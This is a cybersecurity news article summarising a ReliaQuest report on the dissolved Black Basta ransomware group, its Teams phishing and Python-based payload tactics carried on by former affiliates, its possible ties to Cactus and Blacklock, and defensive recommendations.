ReliaQuest details Black Basta’s legacy & rise of Teams phishing

ReliaQuest has released an in-depth report on the state of Black Basta, a former ransomware-as-a-service (RaaS) group, following the leak of the group's internal chat logs and its subsequent dissolution in February 2025.

The demise of Black Basta, a Russian-speaking criminal group previously active in naming up to 50 victims each month on its data-leak site, was triggered by a member known as ExploitWhispers. This individual leaked private chat logs on Telegram out of frustration with the group's decision to target Russian financial organisations, revealing the internal dynamics and operational methods of one of the most prolific RaaS groups to date.

Ongoing impact

Despite the cessation of activity under the Black Basta name, ReliaQuest's analysis shows that many of the group's phishing and intrusion tactics continue to be used. Former affiliates are operating with a consistent set of methods, relying heavily on large-scale email spam and Microsoft Teams phishing, and adapting to include techniques such as Python script execution to deliver payloads.

"Despite the group's dissolution, former members continue to use its tried-and-tested tactics, with mass email spam followed by Teams phishing remaining a persistent and effective attack method. 'New' ransomware groups like '3AM' are taking pages from Black Basta's playbook, particularly its signature phishing tact," ReliaQuest notes in its assessment.

The organisation reported that Teams phishing attacks have maintained a steady pace since February 2025, with a marked increase in April when these incidents accounted for more than 35% of Black Basta-style activity targeting ReliaQuest's own customers. Half of these observed attacks originated from onmicrosoft[.]com domains, exploiting the ease of account creation and rotation on Microsoft's platform. The report suggests this trend is expected to continue.

The use of onmicrosoft[.]com domains remains the primary method for launching phishing campaigns via Teams, but the report highlights that efforts to compromise microsoft[.]com accounts, which give campaigns more credibility, are also growing. While such attacks are harder to carry out, their sophistication and risk could increase in the coming months.

Evolving methodology

"Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads."

ReliaQuest documented a May 2025 case involving a manufacturing sector client, where attackers used a Teams phishing campaign from an onmicrosoft[.]com-based account to gain remote access via Quick Assist and AnyDesk. Python scripts were then deployed to download and execute a markdown file, enabling command and control (C2) communications. The attack was detected and contained before it could escalate.

Shifts among ransomware groups

The closure of Black Basta's data-leak site, paired with the continuation of its trademark tactics, suggests that its former members may have joined other RaaS collectives or formed new ones. Leaked chat logs indicate a substantial payment—between USD $500,000 and USD $600,000—by Black Basta's leader to the Cactus RaaS group, suggesting a relationship between the two. There was also a notable increase in named victim organisations on Cactus's data-leak site that coincided with Black Basta's closure.

Another scenario under consideration is that affiliates have transitioned to "Blacklock", a RaaS group previously known as Eldorado, which has named more than 50 organisations on its site. Eldorado's Russian-speaking origins and rebranding have led to speculation about links to Black Basta's membership.

Internal organisation and adaptation

ReliaQuest's analysis of the leaked chat logs provides insight into Black Basta's operational structure, which included defined roles such as intrusion specialists, campaign managers, and ransomware developers. The group also collaborated with external malware developers and used purchased access to tools like QakBot and DarkGate for campaigns, maintaining communication chains for technical support and updates.

ReliaQuest highlights the group's flexibility in tactics, warning that an overemphasis on defending against a single vector—such as brute-force attacks—could leave organisations exposed to more sophisticated phishing methods. The report urges a comprehensive, multi-layered defense posture.

Mitigating the threat

ReliaQuest emphasises the importance of user education to counter the social engineering techniques favoured by ransomware affiliates.

"To counter these threats, organisations should prioritise user education on phishing tactics. Informed and vigilant employees are often the first and most effective line of defence, stopping social engineering attacks before they succeed."

Recent case studies in sectors including finance, insurance, and construction indicated that previous staff training helped potential victims avoid compromise during coordinated phishing campaigns. Security teams received real-time alerts and took prompt action, benefiting from employee awareness programmes.

Additional recommendations for defence include restricting the use of personal Google accounts on company devices, implementing detection rules for unusual Python activity, monitoring for unauthorised remote-access tools, and deploying automated response playbooks for threat containment.

ReliaQuest's threat research team continues to monitor shifting TTPs (tactics, techniques, and procedures) among ransomware groups, rapidly integrating new indicators of compromise into its security platform and supporting customers with intelligence-driven threat hunting and response measures.

The report concludes that the tactics established by Black Basta are likely to remain prominent among ransomware operators, underscoring the need for ongoing vigilance, robust technical controls, and investment in cyber awareness among staff.